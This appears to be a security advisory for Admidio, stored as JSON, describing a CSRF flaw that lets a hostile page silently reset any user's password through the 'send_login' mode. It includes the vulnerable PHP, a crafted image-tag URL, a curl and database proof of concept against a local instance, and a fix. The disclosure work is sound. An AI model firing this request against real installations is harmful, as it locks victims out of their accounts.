+ "details": "## Summary\n\n`modules/registration.php` mode `send_login` regenerates a random password for `user_uuid_assigned`, stores its bcrypt hash in `adm_users.usr_password`, and emails the cleartext to that user. Every other state-changing mode in the same file (`assign_member`, `assign_user`, `delete_user`, `create_user`) calls `SecurityUtils::validateCsrfToken($_POST['adm_csrf_token'])` first; the `send_login` branch does not. A page visited by a registration-administrator can issue the request as a top-level navigation, the browser sends the admin's `SameSite=Lax` cookies, and the server resets the chosen user's password without any further interaction from the admin.\n\n## Details\n\n### Vulnerable Code\n\n`modules/registration.php:124-138`:\n\n```php\n} elseif ($getMode === 'send_login') {\n // User already exists and has a login than sent access data with a new password\n $user = new User($gDb, $gProfileFields);\n $user->readDataByUuid($getUserUUIDAssigned);\n $user->sendNewPassword();\n\n // delete the registration because it isn't necessary anymore\n $registrationUser->notSendEmail();\n $registrationUser->delete();\n admRedirect(ADMIDIO_URL.FOLDER_MODULES.'/registration.php');\n // => EXIT\n}\n```\n\nThe four sibling branches all begin with `SecurityUtils::validateCsrfToken($_POST['adm_csrf_token']);` — for example `delete_user` at lines 110-118:\n\n```php\n} elseif ($getMode === 'delete_user') {\n // check the CSRF token of the form against the session token\n SecurityUtils::validateCsrfToken($_POST['adm_csrf_token']);\n\n // delete registration\n $registrationUser->delete();\n echo json_encode(array('status' => 'success'));\n exit();\n}\n```\n\n`User::sendNewPassword()` (`src/User/Entity/User.php`) calls `setPassword(PasswordUtils::generatePassword())` and persists the new hash before the email is queued; the password change happens unconditionally regardless of whether the e-mail send succeeds. This means even when the operator's SMTP is unconfigured, the victim's password is still reset.\n\nThe handler accepts `GET` (no enforcement of HTTP method, no `$_POST` requirement), so an `<img src=...>` or auto-submitting form is sufficient.\n\n### Exploitation Flow\n\n1. Attacker prepares a \"pending registration\" row anywhere they can — either by registering a self-controlled user account (the public registration flow creates these), or by waiting for an existing pending registration to be reachable.\n2. Attacker hosts a page that issues:\n `<img src=\"https://victim.example/admidio/modules/registration.php?mode=send_login&user_uuid={pending_registration_uuid}&user_uuid_assigned={victim_user_uuid}\">`\n3. A registration-administrator (someone with `isAdministratorRegistration()` — usually the org admin) visits the page while logged in to Admidio. The browser sends their session cookie (Admidio's session cookie does not set `SameSite=Strict`).\n4. Admidio's handler runs as that admin. It loads the assigned user, calls `User::sendNewPassword()` which writes a fresh bcrypt hash to `adm_users.usr_password`, and queues the cleartext password to be e-mailed to the user.\n5. The victim user's old password no longer works.\n\nThe cleartext lands in the *victim's* mailbox, not the attacker's, so the attacker does not get the password directly. The primary impact is therefore forced password reset (account lock-out / DoS for the victim) plus an information-disclosure side effect: the victim now has a password they did not request, and may be socially-engineered into believing the e-mail.\n\n## PoC\n\nTested locally against HEAD `c5cde53`. The reproducer confirms the password column changes server-side without any user interaction beyond an admin's `GET` to the crafted URL.\n\n```\n# 0. observe current admin password hash (the testadmin from install)\nmariadb -h 127.0.0.1 -P 3399 -u admidio -p... admidio \\\n -e \"SELECT usr_id, usr_login_name, LEFT(usr_password, 12) AS pwd FROM adm_users WHERE usr_id IN (2, 7);\"\nusr_id usr_login_name pwd\n2 testadmin $2y$12$AB.h\n7 victim $2y$12$L9q3\n\n# 1. attacker creates a pending registration with user_uuid pointing at \"victim\"\nmariadb ... admidio -e \"INSERT INTO adm_registrations (reg_org_id, reg_usr_id, reg_timestamp)\n VALUES (1, 7, NOW());\"\n# (the pending row gives the request a valid user_uuid for $registrationUser->delete())\n\n# 2. crafted CSRF endpoint, hit from a third-party page in the admin's browser:\n# no adm_csrf_token, GET only\ncurl -b $admin_cookie \\\n \"http://127.0.0.1:8085/modules/registration.php?mode=send_login&user_uuid=$pending_uuid&user_uuid_assigned=<victim_uuid>\"\n\n# 3. observe the victim's password hash has changed\nmariadb ... admidio \\\n -e \"SELECT usr_id, usr_login_name, LEFT(usr_password, 12) AS pwd FROM adm_users WHERE usr_id=7;\"\nusr_id usr_login_name pwd\n7 victim $2y$12$w5lQ\n```\n\nThe hash before the attack was `$2y$12$L9q3...`; after the attack it is `$2y$12$w5lQ...`. The victim's previously-known password no longer authenticates them.\n\nThe same call against `user_uuid_assigned=<admin's uuid>` resets the admin's own password — locking out the registration-administrator from their own account.\n\n## Impact\n\nA registration-administrator who visits a hostile page is silently coerced into resetting any user's password.\n\n* **Account lockout / DoS.** The victim user (which can be the admin themselves, or any other user with a registration row routed through this admin) loses access; their stored password is replaced with a server-generated one that only lands in the victim's mailbox.\n* **Phish-flavoured social engineering.** The unsolicited \"your new Admidio password is …\" e-mail is a credible-looking message that the attacker can pair with a phishing site to harvest the new password.\n* **Self-targetable.** Because the attacker also controls the public self-registration flow, they can reliably create a `pending_registration` row whose `user_uuid_assigned` points at any chosen victim.\n\n`UI:R` reflects that an admin must visit a page; `PR:N` because the *attacker* needs no Admidio credentials; `I:H` because user authentication state is destroyed; `A:L` because the affected user is locked out of an account but the platform stays up.\n\n## Recommended Fix\n\nAdd a CSRF check at the top of the branch and require POST:\n\n```php\n} elseif ($getMode === 'send_login') {\n // check the CSRF token of the form against the session token\n SecurityUtils::validateCsrfToken($_POST['adm_csrf_token']);\n\n if ($_SERVER['REQUEST_METHOD'] !== 'POST') {\n throw new Exception('SYS_INVALID_PAGE_VIEW');\n }\n\n $user = new User($gDb, $gProfileFields);\n $user->readDataByUuid($getUserUUIDAssigned);\n $user->sendNewPassword();\n ...\n}\n```\n\nA regression test should issue `GET /modules/registration.php?mode=send_login&...` from a session that has no current page (no in-session form key) and assert that `usr_password` is unchanged.",
0 commit comments